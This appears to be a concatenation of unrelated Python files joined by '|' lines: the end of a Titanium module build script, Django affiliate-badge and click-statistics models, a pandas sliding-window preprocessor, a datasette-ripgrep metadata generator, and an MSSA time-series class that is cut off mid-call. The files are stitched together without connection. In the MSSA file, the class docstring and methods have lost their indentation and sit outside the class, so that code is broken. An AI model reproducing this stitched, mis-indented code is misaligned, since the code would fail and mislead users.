    zf.write('build/%s' % libname, '%s/%s' % (modulepath, libname))
    docs = generate_doc(config)
    if docs != None:
        for doc in docs:
            # Fix: dict.iteritems() is Python-2-only; items() works in both.
            for file, html in doc.items():
                # Fix: str.replace replaces the deprecated string.replace
                # module function (removed in Python 3).
                filename = file.replace('.md', '.html')
                zf.writestr('%s/documentation/%s' % (modulepath, filename), html)
    zip_dir(zf, 'assets', modulepath, ['.pyc', '.js'])
    zip_dir(zf, 'example', modulepath, ['.pyc'])
    zip_dir(zf, 'platform', modulepath, ['.pyc', '.js'])
    zf.write('../LICENSE', '%s/LICENSE' % modulepath)
    zf.write('module.xcconfig', '%s/module.xcconfig' % modulepath)
    exports_file = 'metadata.json'
    if os.path.exists(exports_file):
        zf.write(exports_file, '%s/%s' % (modulepath, exports_file))
    zf.close()
if __name__ == '__main__':
    # Build pipeline: validate inputs, locate the Titanium SDK, compile the
    # bundled JS, build the native module, then zip the distributable.
    manifest,mf = validate_manifest()
    validate_license()
    config = read_ti_xcconfig()
    sdk = find_sdk(config)
    # Make the SDK's python helper packages (compiler, tools) importable.
    sys.path.insert(0,os.path.join(sdk,'iphone'))
    sys.path.append(os.path.join(sdk, "common"))
    compile_js(manifest,config)
    build_module(manifest,config)
    package_module(manifest,mf,config)
    sys.exit(0)
|
from collections import defaultdict
from datetime import datetime
from django.conf import settings
from django.contrib.auth.models import User
from django.core.cache import cache
from django.db import models
from caching.base import CachingManager, CachingMixin
from shared.models import LocaleImage, ModelBase, MultiTableParentModel
# Cache keys
# Keys (and %-format key templates) used with Django's low-level cache API
# by the manager classes below.
CACHE_CLICKS_TOTAL = 'clicks_total'
CACHE_CLICKS_BADGE_TOTAL = 'clicks_badge_total_%s'
CACHE_CLICKS_AVG = 'clicks_avg_%s_%s'
CACHE_CLICKS_USERPERIOD_TOTAL = 'clicks_userperiod_total_%s_%s_%s'
CACHE_TOP_USERS = 'top_users'
class Category(CachingMixin, ModelBase):
    """Top-level category that contains sub-categories."""
    # Display name for the category.
    name = models.CharField(max_length=255)

    # cache-machine manager: querysets are cached and invalidated on save.
    objects = CachingManager()

    def __unicode__(self):
        return self.name
class Subcategory(CachingMixin, ModelBase):
    """Second-level category that contains badges."""
    parent = models.ForeignKey(Category)
    name = models.CharField(max_length=255)

    # Consistency fix: every other CachingMixin model in this module pairs
    # the mixin with CachingManager; without it, Subcategory querysets were
    # never actually cached by cache-machine.
    objects = CachingManager()

    def preview_img_url(self, locale):
        """Return the preview image URL of a random badge in this
        subcategory, or the default preview when it has no badges."""
        try:
            # TODO: Track timing data for this in statsd
            badge = self.badge_set.order_by('?')[:1]
            return badge[0].preview_img_url(locale)
        except IndexError:
            return settings.DEFAULT_BADGE_PREVIEW

    def __unicode__(self):
        return self.name
class Badge(CachingMixin, MultiTableParentModel):
    """
    Parent model for any banner, text link, or other item that users will put
    on their website as an affiliate link.
    """
    name = models.CharField(max_length=255)
    subcategory = models.ForeignKey(Subcategory)
    href = models.URLField(verify_exists=False,
                           verbose_name=u'URL to redirect to')
    displayed = models.BooleanField(default=True)

    objects = CachingManager()

    @property
    def clicks(self):
        """Total click count for this badge, via the cached aggregate."""
        return ClickStats.objects.total_for_badge(self)

    def customize_url(self):
        """Return a URL pointing to the customization page for this badge."""
        return self.child().customize_url()

    def preview_img_url(self, locale):
        """Return a URL pointing to a preview image for this badge."""
        previews = self.badgepreview_set
        return (
            # First try the proper preview
            self._get_preview(previews, locale=locale) or
            # Fallback to the default language
            self._get_preview(previews, locale=settings.LANGUAGE_CODE) or
            # Fallback again to the first available locale
            self._latest_preview(previews) or
            # Really? Nothing? Oh well. Firefox logo it is.
            settings.DEFAULT_BADGE_PREVIEW)

    def _get_preview(self, previews, **kwargs):
        """Return the image URL of the single preview matching **kwargs,
        or None when there is no (unique) match.

        Fix: parameter renamed from `set`, which shadowed the builtin.
        """
        try:
            return previews.get(**kwargs).image.url
        except (BadgePreview.DoesNotExist,
                BadgePreview.MultipleObjectsReturned):
            return None

    def _latest_preview(self, previews):
        """Return the image URL of the first available preview, or None."""
        result = list(previews.all()[:1])
        if result:
            return result[0].image.url
        return None

    def __unicode__(self):
        return self.name
class BadgePreview(CachingMixin, LocaleImage):
    """Locale-specific preview image for a Badge."""
    badge = models.ForeignKey(Badge)

    class Meta:
        # At most one preview per (locale, badge) pair.
        unique_together = ('locale', 'badge')

    def __unicode__(self):
        return 'Preview: %s(%s)' % (self.badge, self.locale)
class BadgeInstanceManager(CachingManager):
    """Query helpers for BadgeInstance."""

    def for_user_by_category(self, user):
        """Group the user's badge instances by top-level category name."""
        grouped = defaultdict(list)
        for instance in BadgeInstance.objects.no_cache().filter(user=user):
            grouped[instance.badge.subcategory.parent.name].append(instance)
        return grouped
class BadgeInstance(CachingMixin, MultiTableParentModel):
    """
    Single instance of a badge that a user has created and sent clicks to.
    """
    created = models.DateTimeField(auto_now_add=True)
    user = models.ForeignKey(User)
    badge = models.ForeignKey(Badge)
    # Denormalized lifetime click total; kept in sync by add_click().
    clicks = models.PositiveIntegerField(default=0)

    objects = BadgeInstanceManager()

    @property
    def preview(self):
        """Return the HTML to preview this BadgeInstance."""
        return self.child().preview

    @property
    def code(self):
        """Return the HTML to embed this BadgeInstance."""
        return self.child().code

    def details_template(self):
        """
        Return the path for the template used to render details about
        this badgeinstance on the my_banners page. Returns None if there
        is no template.
        """
        return getattr(self.child(), 'details_template', None)

    def add_click(self, year=None, month=None):
        """Add a click to this instance and associated ClickStats objects."""
        if year is None or month is None:
            now = datetime.now()
            if year is None:
                year = now.year
            if month is None:
                month = now.month
        # ClickStats rows are bucketed by month: day is fixed at the 1st.
        dt = datetime(year, month, 1)
        stats, created = self.clickstats_set.get_or_create(datetime=dt)
        # F() expressions make the DB do the increment, avoiding a
        # read-modify-write race between concurrent clicks.
        stats.clicks = models.F('clicks') + 1
        stats.save()
        self.clicks = models.F('clicks') + 1
        self.save()
class ClickStatsManager(models.Manager):
    """Aggregation helpers over ClickStats, fronted by the low-level cache."""

    def total(self):
        """Return the total number of clicks"""
        total = cache.get(CACHE_CLICKS_TOTAL)
        if total is None:
            total = self._total()
            cache.set(CACHE_CLICKS_TOTAL, total)
        return total

    def total_for_badge(self, badge):
        """
        Return the total number of clicks for each badge.
        """
        key = CACHE_CLICKS_BADGE_TOTAL % (badge.pk)
        total = cache.get(key)
        if total is None:
            total = self._total(badge_instance__badge=badge)
            cache.set(key, total)
        return total

    def total_for_user(self, user):
        """Return the total number of clicks found for the given user."""
        # NOTE(review): unlike the other totals, this reads the denormalized
        # BadgeInstance.clicks counter and is not cached — confirm that is
        # intentional.
        results = (BadgeInstance.objects.filter(user=user)
                   .aggregate(models.Sum('clicks')))
        return results['clicks__sum'] or 0

    def total_for_user_period(self, user, month, year):
        """
        Return the total number of clicks found for the given user and month.
        """
        key = CACHE_CLICKS_USERPERIOD_TOTAL % (user.id, month, year)
        total = cache.get(key)
        if total is None:
            total = self._total(badge_instance__user=user,
                                datetime__month=month, datetime__year=year)
            cache.set(key, total)
        return total

    def _total(self, **kwargs):
        """Return the total number of clicks for the given filters."""
        clickstats = self.filter(**kwargs)
        results = clickstats.aggregate(models.Sum('clicks'))
        return results['clicks__sum'] or 0

    def average_for_period(self, month, year):
        """Return the average number of clicks for the given period."""
        key = CACHE_CLICKS_AVG % (month, year)
        average = cache.get(key)
        if average is None:
            clicks_sum = models.Sum('badgeinstance__clickstats__clicks')
            # Average of per-user click sums for the given month/year.
            results = (User.objects
                       .filter(badgeinstance__clickstats__datetime__month=month,
                               badgeinstance__clickstats__datetime__year=year)
                       .annotate(clicks=clicks_sum)
                       .aggregate(models.Avg('clicks')))
            # Average is sometimes None, so substitute 0
            average = results['clicks__avg'] or 0
            # Remove decimal
            average = int(average)
            cache.set(key, average)
        return average
class ClickStats(ModelBase):
    """Tracks historical data for an affiliate's referrals."""
    badge_instance = models.ForeignKey(BadgeInstance)
    # First day of the month this row aggregates (see BadgeInstance.add_click).
    datetime = models.DateTimeField()
    clicks = models.IntegerField(default=0)

    objects = ClickStatsManager()

    class Meta:
        # One stats row per instance per month bucket.
        unique_together = ('badge_instance', 'datetime')
class LeaderboardManager(CachingManager):
    """Query helpers for the Leaderboard standings table."""

    def top_users(self, count):
        """Return the top *count* leaderboard rows (best ranking first).

        Fixes two defects in the original:
        - the cache key now includes *count*, so calls with different
          counts no longer return a previously cached, differently sized
          result;
        - the queryset is materialized to a list before caching, so
          callers get the same type (list) whether the cache was warm or
          cold.
        """
        cache_key = '%s_%s' % (CACHE_TOP_USERS, count)
        leaderboard = cache.get(cache_key)
        if leaderboard is None:
            leaderboard = list(self.select_related('user', 'user__userprofile')
                               .order_by('ranking')[:count])
            cache.set(cache_key, leaderboard)
        return leaderboard
class Leaderboard(CachingMixin, ModelBase):
    """Stores a user's standing in the leaderboard."""
    # Position in the standings; doubles as the primary key.
    ranking = models.PositiveIntegerField(primary_key=True)
    user = models.ForeignKey(User)
    # Click total used to compute the ranking.
    clicks = models.PositiveIntegerField()

    objects = LeaderboardManager()
|
# preprocessing
import pandas as pd
import sys
import numpy as np
def main(size):
    """Apply a sliding window of length *size* over the sensor data.

    Reads "all2.csv" (index column + x/y/z accelerometer values plus
    movement and user labels), flattens each window of x/y/z samples into
    one feature row (restarting the window whenever the movement or user
    label changes), and writes the rows to sliding<N>.csv, flushing a new
    file every 100,000 processed positions.

    Fixes vs. the original:
    - `.ix` (removed from pandas) replaced by `.iloc`; the original used
      integer labels on a RangeIndex, so label slicing was inclusive —
      hence `start:end + 1` below;
    - `DataFrame.append` (removed in pandas 2.0, and O(n^2) when called
      per row) replaced by collecting frames and calling `pd.concat`
      once per output file.
    """
    all_csv = pd.read_csv(
        "all2.csv",
        dtype={'x': np.int16, 'y': np.int16, 'z': np.int16,
               'movement': np.int8, 'user': np.int8})
    start = 0
    index_increment = size + start - 1  # window span: end - start == size - 1
    end = index_increment
    iteration = 1
    mycolumns = []
    window_frames = []  # flattened windows awaiting the next flush
    prev_movement = all_csv.iloc[end, 4]
    prev_userid = all_csv.iloc[end, 5]
    counter_100k = 1
    out_file = "sliding{}.csv"
    while all_csv.shape[0] - 1 > end:
        movement = all_csv.iloc[end, 4]
        userid = all_csv.iloc[end, 5]
        if (prev_movement != movement) or (prev_userid != userid):
            # Window crosses a segment boundary: restart it at the new label.
            start = end
            end = start + index_increment
            prev_movement = movement
            prev_userid = userid
            continue
        # Columns 1:4 are x, y, z (column 0 is the CSV index column);
        # rows start..end inclusive form one window.
        tmp = all_csv.iloc[start:end + 1, 1:4]
        tmp = tmp.stack().to_frame().T
        prev_movement = movement
        prev_userid = userid
        if iteration == 1:
            # Derive flat column names ("<row>_<axis>") once, from the
            # first window's (row, axis) MultiIndex.
            mycolumns = ['{}_{}'.format(*c) for c in tmp.columns]
            iteration = 2
        tmp.columns = mycolumns
        tmp['movement'] = movement
        tmp['user'] = userid
        tmp[['movement', 'user']] = tmp[['movement', 'user']].astype(np.int8)
        window_frames.append(tmp)
        start += 1
        end += 1
        if end % 1000 == 0:
            print(end)  # progress indicator
        if end % 100000 == 0:
            # Flush to CSV and start a fresh buffer to bound memory use.
            pd.concat(window_frames).to_csv(out_file.format(counter_100k), sep=',')
            window_frames = []
            counter_100k += 1
    # Write out the final (possibly empty) batch.
    if window_frames:
        pd.concat(window_frames).to_csv(out_file.format(counter_100k), sep=',')
    else:
        pd.DataFrame().to_csv(out_file.format(counter_100k), sep=',')
if __name__ == '__main__':
    # Window length (number of samples) used for feature extraction.
    sliding_window_size=50
    main(sliding_window_size)
from datetime import datetime
import os
import pytz
from pytz import timezone
# Map each checked-out project under all/ to its remote repository URL,
# read from the project's .git/config.
project_urls = {}
projects = os.listdir('all')
for project in projects:
    git_config = os.path.join('all', project, '.git', 'config')
    with open(git_config, encoding='utf-8') as f:
        for line in f:
            if line.strip().startswith('url'):
                url = line.split()[-1]
                # Fix: str.rstrip('.git') strips any trailing '.', 'g', 'i'
                # or 't' characters (so 'boring.git' became 'borin');
                # remove the exact '.git' suffix instead.
                if url.endswith('.git'):
                    url = url[:-len('.git')]
                project_urls[project] = url
# YAML metadata template for datasette-ripgrep; %(updated)s and
# %(project_links)s are substituted below.
# Fix: removed a stray closing </code> tag before the `!setup.py` example
# that produced malformed HTML.
metadata_template = """\
title: Search Enthought Tool Suite Source Code
about: achabotl/datasette-ripgrep-ets
about_url: https://github.com/achabotl/datasette-ripgrep-ets
description_html: |-
    <style>
    form.ripgrep label {
        font-weight: normal;
        display: inline;
    }
    </style>
    <form class="ripgrep" action="/-/ripgrep" method="get">
        <p>
            <input type="search" name="pattern" value="">
            <input type="submit" value="Search">
        </p>
        <p><strong>Options:</strong> <label><input type="checkbox" name="literal"> Literal search (not regex)</label> <label><input type="checkbox" name="ignore"> Ignore case</label></p>
        <p>
            <label><strong>File pattern</strong>: <input type="text" style="max-width: 20em" name="glob" value=""></label>
        </p>
        <p class="glob-examples">For example <code>*.py</code> or <code>**/templates/**/*.html</code> or <code>datasette/**</code> or <code>!setup.py</code>
        </p>
    </form>
    <p>%(updated)s</p>
    <ul class="bullets">
%(project_links)s
    </ul>
plugins:
    datasette-ripgrep:
        path: /app/all
        time_limit: 5.0
"""
# Timestamp (US/Central) for the "last indexed" banner.
us_central = timezone('US/Central')
now = datetime.now(pytz.utc).astimezone(us_central)
fmt = '%Y-%m-%d %H:%M:%S %Z%z'
updated = f"The following projects were last indexed on {now.strftime(fmt)}:"

# One <li> per project, sorted by project name.
sorted_projects = sorted(project_urls.items())
project_links = '\n'.join(
    f'        <li><a href="{url}">{project}</a></li>'
    for project, url in sorted_projects)

metadata = metadata_template % {'updated': updated, 'project_links': project_links}

with open('./metadata.yml', 'w', encoding='utf-8') as f:
    f.write(metadata)
|
import numpy as np
from numpy.linalg import matrix_rank
from pprint import pprint
from scipy.spatial.distance import cdist, pdist, squareform
from scipy.linalg import hankel
from functools import partial, lru_cache, reduce
from tqdm.autonotebook import tqdm
from .optimized import *
from .ops import *
from sklearn.utils.extmath import randomized_svd
from sklearn.metrics import explained_variance_score
class MSSA:
'''Multivariate Singular Spectrum Analysis
Implements MSSA decomposition and (recurrent) forecasting using MSSA. This
implementation uses the vertical (V-MSSA) rather than horizontal (H-MSSA)
structure for the trajectory matrix.
Parameters
----------
window_size : int | None
The window size parameter controls the dimensionality of the trajectory
matrices constructed for each timeseries (and then stacked). Timeseries
are converted into trajectory matrices through "hankelization", where
columns and rows represent different "windows" of the timeseries,
incrementing across the timeseries. With window_size = L, the resulting
trajectory matrix of a timeseries vector (N) will be of shape (L, K), where
K = N - L + 1. As such, window_size should be no greater than N // 2. If
left as None, MSSA will select the maximum possible window size.
Note that with a multivariate timeseries input matrix (N, P), the resulting
trajectory matrix stacked vertically will be of shape (P * L, K).
The window size parameter can have a significant impact on the quality of
the MSSA decomposition and forecasting. Some recommend that window
size should be as large as possible to capture the most signal
in the data, but there does not seem to be general agreement on a "best"
window size. The author of the MSSA algorithm states in one of her papers
that it is best to try many different window size parameters to see what
works best with your data. If you have an idea of what frequency signal
will occur in your data, try out window sizes that are multiples of that
frequency (e.g. 24, 36, 48 if you have monthly data).
n_components: int | None | 'variance_threshold' | 'parallel_analysis' | 'svht'
Argument specifing the number of components to keep from the SVD decomposition.
This is the equivalent of the n_components parameter in sklearn's PCA,
for example. If None, the maximum number of (non-zero singular value)
components will be selected.
There are a few autmatic options for component selection:
- 'svht'
Select components using the Singular Value Hard Thresholding
formula. This is the default setting. For more details on this
formula please see this paper: https://arxiv.org/pdf/1305.5870.pdf
- 'parallel_analysis'
Performs parallel analysis to select the number of components that
outperform a user-specified percentile threshold of noise components
from randomly generated datasets of the same shape. Parallel analysis
is a gold standard method for selecting a number of components in
principal component analysis, which MSSA is closely related to.
Eigenvalue noise threshold is set via the `pa_percentile_threshold`
argument. Note that this procedure can be very slow depending on
the size of your data.
- 'variance_threshold'
Select the number of components based on a variance explained percent
threshold. The threshold cutoff is specified by the argument
`variance_explained_threshold`
variance_explained_threshold : float | None
If `n_components = 'variance_threshold'`, this argument controls the
cutoff for keeping components based on cumulative variance explained. This
must be a float between 0 and 1. A value of 0.95, for example, will
keep the number of components that explain 95 percent of the variance.
This has no effect unless 'variance_threshold' is the selected method for
`n_components`.
pa_percentile_threshold : float | None
If `n_components = 'parallel_analysis'`, this specifies the percentile
of noise eigenvalues that must be exceeded by the real eigenvalues for
components to be kept. Should be a number between 0 and 100. This has no
effect unless 'parallel_analysis' is selected for `n_components`.
svd_method : str
Can be one of:
- 'randomized'
The default. Uses the `randomized_svd` method from scikit-learn to
perform the singular value decomposition step. It is highly recommended
that you keep this argument as 'randomized', especially if you are
dealing with large data.
- 'exact'
Performs exact SVD via numpy.linalg.svd. This should be OK for small
or even medium size datasets, but is not recommended.
varimax : bool
[EXPERIMENTAL] If `True`, performs a structured varimax rotation on the
left singular vectors following the SVD decomposition step in the
MSSA algorithm. This should be used with caution as the code is experimental.
The idea of applying structured varimax is to better separate the components
for the multiple timeseries fit by MSSA. See this presentation for
more information on the structured varimax rotation applied to MSSA:
http://200.145.112.249/webcast/files/SeminarMAR2017-ICTP-SAIFR.pdf
verbose : bool
Verbosity flag. If true, will print out status updates during the fit
procedure.
Attributes
----------
These attributes will become available after fitting.
N_ : int
Observations in timeseries.
P_ : int
Number of timeseries.
L_ : int
Window size of trajectory matrices.
K_ : int
Column dimension of trajectory matrices.
rank_ : int
The selected rank (number of components kept)
left_singular_vectors_ : numpy.ndarray
The left singular vectors from the decomposition of the covariance of
trajectory matrices via SVD.
singular_values_ : numpy.ndarray
Singular values from SVD
explained_variance_ : numpy.ndarray
The explained variance of the SVD components
explained_variance_ratio_ : numpy.ndarray
Percent of explained variance for each component
components_ : numpy.ndarray
The MSSA components. This is the result of the decomposition and
reconstruction via diagonal averaging. The sum of all the components
for a timeseries (without reducing number of components) will perfectly
reconstruct the original timeseries.
The dimension of this matrix is (P, N, rank), where P is the number
of timeseries, N is the number of observations, and rank is the
number of components selected to keep.
component_ranks_ : numpy.ndarray
This matrix shows the rank of each component per timeseries according
to the reconstruction error. This is a (rank, P) matrix, with rank
being the number of components and P the number of timeseries. For
example, if component_ranks_[0, 0] = 3, this would mean that the
3rd component accounts for the most variance for the first timeseries.
component_ranks_explained_variance_ : numpy.ndarray
This shows the explained variance percent for the ranked components
per timeseries. Like component_ranks_, this is a (rank, P) matrix.
The values in this matrix correspond to the percent of variance
explained by components per timeseries in rank order of their
efficiency in reconstructing the timeseries.
'''
def __init__(self,
             window_size=None,
             n_components='svht',
             variance_explained_threshold=0.95,
             pa_percentile_threshold=95,
             svd_method='randomized',
             varimax=False,
             verbose=True):
    '''Store the construction arguments on the instance.

    All arguments are routed through set_params so that construction and
    sklearn-style parameter updates share a single code path.
    '''
    init_params = dict(
        window_size=window_size,
        n_components=n_components,
        variance_explained_threshold=variance_explained_threshold,
        pa_percentile_threshold=pa_percentile_threshold,
        svd_method=svd_method,
        varimax=varimax,
        verbose=verbose,
    )
    self.set_params(**init_params)
def get_params(self,
               deep=True):
    '''get_params method for compliance with sklearn model api.

    Returns a dict of the constructor parameters currently set on the
    instance; *deep* is accepted for API compatibility and ignored.
    '''
    param_names = (
        'window_size',
        'n_components',
        'variance_explained_threshold',
        'pa_percentile_threshold',
        'svd_method',
        'varimax',
        'verbose',
    )
    return {name: getattr(self, name) for name in param_names}
def set_params(self,
               **parameters):
    '''set_params method for compliance with sklearn model api.

    Each keyword becomes an instance attribute of the same name; returns
    self to allow chaining.
    '''
    for name, value in parameters.items():
        setattr(self, name, value)
    return self
def _apply_structured_varimax(self,
                              left_singular_vectors,
                              singular_values,
                              P,
                              L,
                              gamma=1,
                              tol=1e-6,
                              max_iter=1000):
    '''
    [EXPERIMENTAL]
    Rotate the left singular vectors (and adjust the singular values
    accordingly) with a structured varimax rotation. For more information
    on this procedure in MSSA please see this slideshow:
    http://200.145.112.249/webcast/files/SeminarMAR2017-ICTP-SAIFR.pdf
    '''
    # Rotation matrix computed by the external optimized helper.
    rotation = structured_varimax(
        left_singular_vectors,
        P,
        L,
        gamma=gamma,
        tol=tol,
        max_iter=max_iter
    )
    rotated_vectors = left_singular_vectors @ rotation
    # Rotate the diagonalized singular values into the new basis and keep
    # only the diagonal entries.
    k = singular_values.shape[0]
    rot_k = rotation[:k, :k]
    rotated_values = np.diag(rot_k.T @ np.diag(singular_values) @ rot_k)
    return rotated_vectors, rotated_values
def _parallel_analysis_component_selection(self,
                                           timeseries,
                                           L,
                                           K,
                                           rank,
                                           singular_values,
                                           iterations=100):
    '''
    Performs parallel analysis to help select the appropriate number of MSSA
    components to keep. The algorithm follows these steps:
    1. Calculate the eigenvalues via SVD/PCA on your real dataset.
    2. For a given number of iterations:
        3. Construct a random noise matrix the same shape as your real data.
        4. Perform decomposition of the random noise data.
        5. Calculate the eigenvalues for the noise data and track them per
           iteration.
    6. Calculate the percentile at the user-specified threshold
       (`pa_percentile_threshold`) of the noise eigenvalues.
    7. Select only the number of components in the real data whose eigenvalues
       exceed those at the specified percentile of the noise eigenvalues.
    '''
    def _bootstrap_eigenvalues(ts_std, ts_shape, L, K, rank):
        # create random normal noise with equivalent standard deviations
        ts_rnorm = np.random.normal(
            np.zeros(ts_shape[1]),
            ts_std,
            size=ts_shape
        )
        # create noise trajectory matrix
        rnorm_trajectory_matrix = ts_matrix_to_trajectory_matrix(
            ts_rnorm,
            L,
            K
        )
        # decompose the noise trajectory matrix
        U, s, V, rank = decompose_trajectory_matrix(
            rnorm_trajectory_matrix,
            rank,
            svd_method=self.svd_method
        )
        # return the eigenvalues (squared singular values)
        return s ** 2

    # calculate real eigenvalues
    eigenvalues = singular_values ** 2
    # calculate standard deviations column-wise
    ts_std = np.std(timeseries, axis=0)
    # bootstrap the eigenvalues
    noise_eigenvalues = [
        _bootstrap_eigenvalues(
            ts_std,
            timeseries.shape,
            L,
            K,
            rank
        )
        for i in tqdm(range(iterations), disable=(not self.verbose))
    ]
    noise_eigenvalues = np.concatenate(noise_eigenvalues, axis=0)
    # NOTE(review): concatenate yields one flat vector, so the percentile
    # below is taken over ALL pooled noise eigenvalues rather than per
    # component position as step 6 of the docstring describes; np.vstack
    # was presumably intended — confirm before changing.
    # Fix: honor the user-configured pa_percentile_threshold instead of a
    # hard-coded 95 (falling back to 95 when it is None).
    percentile = self.pa_percentile_threshold
    if percentile is None:
        percentile = 95
    eig_pctl = np.percentile(noise_eigenvalues, percentile, axis=0)
    # first index where the noise percentile exceeds the real eigenvalue
    exceeded = np.where(eig_pctl > eigenvalues)[0]
    if exceeded.size == 0:
        # Fix: every real eigenvalue beats the noise threshold; keep the
        # full rank instead of raising IndexError on the empty result.
        return rank
    return exceeded[0]
def _calculate_optimal_reconstruction_orders(self,
                                             timeseries,
                                             components):
    '''Rank components per timeseries by explained variance.

    Returns (optimal_orders, order_explained_variance): the component
    ordering for reconstructing each timeseries, and the explained
    variance score of each component in that order.
    '''
    orders = optimal_component_ordering(
        timeseries,
        components
    ).astype(int)
    explained = np.zeros_like(orders).astype(float)
    n_timeseries = timeseries.shape[1]
    for ts_idx in range(n_timeseries):
        # Reorder this timeseries' components by their optimal ranking,
        # then score each against the original series.
        reordered = components[ts_idx, :, :][:, orders[:, ts_idx]]
        score_fn = partial(explained_variance_score, timeseries[:, ts_idx])
        explained[:, ts_idx] = np.apply_along_axis(score_fn, 0, reordered)
    return orders, explained
def _validate_initialization_arguments(self):
    '''Validate the constructor arguments; raise Exception on bad values.

    Must run once self.N_ (timeseries length) and self.L_ (window size)
    are known, since some checks depend on them.
    '''
    # Check the window size parameter
    if self.window_size is not None:
        if not isinstance(self.window_size, int):
            raise Exception("window_size must be an integer (or None).")
        if self.window_size > (self.N_ // 2):
            raise Exception("window_size must be <= (timeseries length // 2).")

    # Check the components parameter
    if self.n_components is not None:
        if isinstance(self.n_components, str):
            comp_options = ['variance_threshold', 'svht', 'parallel_analysis']
            if self.n_components not in comp_options:
                # Fix: message typo ("mus" -> "must")
                raise Exception('automatic n_component selections must be one of:', comp_options)
        elif isinstance(self.n_components, int):
            if self.n_components > (self.N_ - self.L_ + 1):
                raise Exception("Too many n_components specified for given window_size.")
            if self.n_components < 1:
                raise Exception("n_components cannot be set < 1.")
        else:
            raise Exception('Invalid value for n_components set.')

    # Check variance explained threshold
    if self.variance_explained_threshold is not None:
        if not (self.variance_explained_threshold > 0):
            raise Exception("variance_explained_threshold must be > 0 (or None).")
        if not (self.variance_explained_threshold <= 1):
            raise Exception("variance_explained_threshold must be <= 1 (or None).")
    elif self.n_components == 'variance_threshold':
        raise Exception("If n_components == 'variance_threshold', variance_explained_threshold cannot be None.")

    # check parallel analysis threshold
    # Fix: the original compared n_components against 'auto', a value it
    # can never legally hold (see comp_options above), so this guard never
    # fired; 'parallel_analysis' is the mode that needs the threshold.
    if self.pa_percentile_threshold is None and self.n_components == 'parallel_analysis':
        raise Exception("If n_components == 'parallel_analysis', pa_percentile_threshold must be specified.")
    if self.pa_percentile_threshold is not None:
        if (self.pa_percentile_threshold <= 0) or (self.pa_percentile_threshold > 100):
            raise Exception("pa_percentile_threshold must be > 0 and <= 100.")

    # check svd method
    if not self.svd_method in ['randomized', 'exact']:
        raise Exception("svd_method must be one of 'randomized', 'exact'.")
def fit(self, timeseries):
    '''Performs MSSA decomposition on a univariate or multivariate timeseries.

    Multivariate timeseries should have observations in rows and timeseries
    indices in columns.

    After fitting, many attributes become available to the user:

    N_ : int
        Observations in timeseries.
    P_ : int
        Number of timeseries.
    L_ : int
        Window size of trajectory matrices.
    K_ : int
        Column dimension of trajectory matrices.
    rank_ : int
        The selected rank (number of components kept)
    left_singular_vectors_ : numpy.ndarray
        The left singular vectors from the decomposition of the covariance of
        trajectory matrices via SVD.
    singular_values_ : numpy.ndarray
        Singular values from SVD
    explained_variance_ : numpy.ndarray
        The explained variance of the SVD components
    explained_variance_ratio_ : numpy.ndarray
        Percent of explained variance for each component
    components_ : numpy.ndarray
        The MSSA components. This is the result of the decomposition and
        reconstruction via diagonal averaging. The sum of all the components
        for a timeseries (without reducing number of components) will perfectly
        reconstruct the original timeseries.
        The dimension of this matrix is (P, N, rank), where P is the number
        of timeseries, N is the number of observations, and rank is the
        number of components selected to keep.
    component_ranks_ : numpy.ndarray
        This matrix shows the rank of each component per timeseries according
        to the reconstruction error. This is a (rank, P) matrix, with rank
        being the number of components and P the number of timeseries. For
        example, if component_ranks_[0, 0] = 3, this would mean that the
        3rd component accounts for the most variance for the first timeseries.
    component_ranks_explained_variance_ : numpy.ndarray
        This shows the explained variance percent for the ranked components
        per timeseries. Like component_ranks_, this is a (rank, P) matrix.
        The values in this matrix correspond to the percent of variance
        explained by components per timeseries in rank order of their
        efficiency in reconstructing the timeseries.

    Parameters
    ----------
    timeseries : numpy.ndarray | pandas.DataFrame | pandas.Series
        The timeseries data to be decomposed. This will be converted to
        a numpy array if it is in pandas format.
    '''
    # Accept pandas objects by taking .values; plain arrays pass through.
    timeseries = getattr(timeseries, 'values', timeseries)
    # Univariate input becomes a single-column 2D array.
    if timeseries.ndim == 1:
        timeseries = timeseries[:, np.newaxis]
    self.timeseries_ = timeseries
    self.N_ = timeseries.shape[0]
    self.P_ = timeseries.shape[1]
    # Default window size is half the series length; the user-specified
    # window_size (validated below) overrides it.
    self.L_ = (self.N_ // 2)
    self._validate_initialization_arguments()
    if self.window_size is not None:
        self.L_ = self.window_size
    self.K_ = self.N_ - self.L_ + 1
    if self.verbose:
        print('Constructing trajectory matrix')
    self.trajectory_matrix_ = ts_matrix_to_trajectory_matrix(
        self.timeseries_,
        self.L_,
        self.K_
    )
    if self.verbose:
        print('Trajectory matrix shape:', self.trajectory_matrix_.shape)
    if self.verbose:
        print('Decomposing trajectory covariance matrix with SVD')
    U, s, V, rank = decompose_trajectory_matrix(
        self.trajectory_matrix_,
        self.K_,
        svd_method=self.svd_method
    )
    self.rank_ = rank
    self.left_singular_vectors_ = U
    self.singular_values_ = s
    # Optional structured-varimax rotation of the singular vectors.
    if self.varimax:
        if self.verbose:
            print('Applying structured varimax to singular vectors')
        self.left_singular_vectors_, self.singular_values_ = self._apply_structured_varimax(
            self.left_singular_vectors_,
            self.singular_values_,
            self.P_,
            self.L_
        )
    exp_var, exp_var_ratio = sv_to_explained_variance_ratio(
        self.singular_values_,
        self.N_
    )
    self.explained_variance_ = exp_var
    self.explained_variance_ratio_ = exp_var_ratio
    # Rank (component count) selection according to the n_components mode.
    if self.n_components == 'svht':
        # Singular value hard thresholding.
        self.rank_ = singular_value_hard_threshold(
            self.singular_values_,
            rank=self.rank_
        )
        if self.verbose:
            print('Reduced rank to {} according to SVHT threshold'.format(self.rank_))
    elif self.n_components == 'variance_threshold':
        # Keep components whose cumulative explained-variance ratio stays
        # at or below the configured threshold.
        exp_var_ratio_cs = np.cumsum(exp_var_ratio)
        cutoff_n = np.sum(exp_var_ratio_cs <= self.variance_explained_threshold)
        self.rank_ = cutoff_n
        if self.verbose:
            print('Reduced rank to {} according to variance explained threshold'.format(self.rank_))
    elif self.n_components == 'parallel_analysis':
        if self.verbose:
            print('Performing parallel analysis to determine optimal rank')
        self.rank_ = self._parallel_analysis_component_selection(
            self.timeseries_,
            self.L_,
            self.K_,
            self.rank_,
            self.singular_values_
        )
        if self.verbose:
            print('Rank selected via parallel analysis: {}'.format(self.rank_))
    elif isinstance(self.n_components, int):
        # Fixed integer rank, capped at the decomposition's full rank.
        self.rank_ = np.minimum(self.rank_, self.n_components)
    if self.verbose:
        print('Constructing components')
    # Reconstruct each kept component per timeseries via diagonal averaging.
    self.components_ = incremental_component_reconstruction(
        self.trajectory_matrix_,
        self.left_singular_vectors_,
        self.singular_values_,
        self.rank_,
        self.P_,
        self.N_,
        self.L_
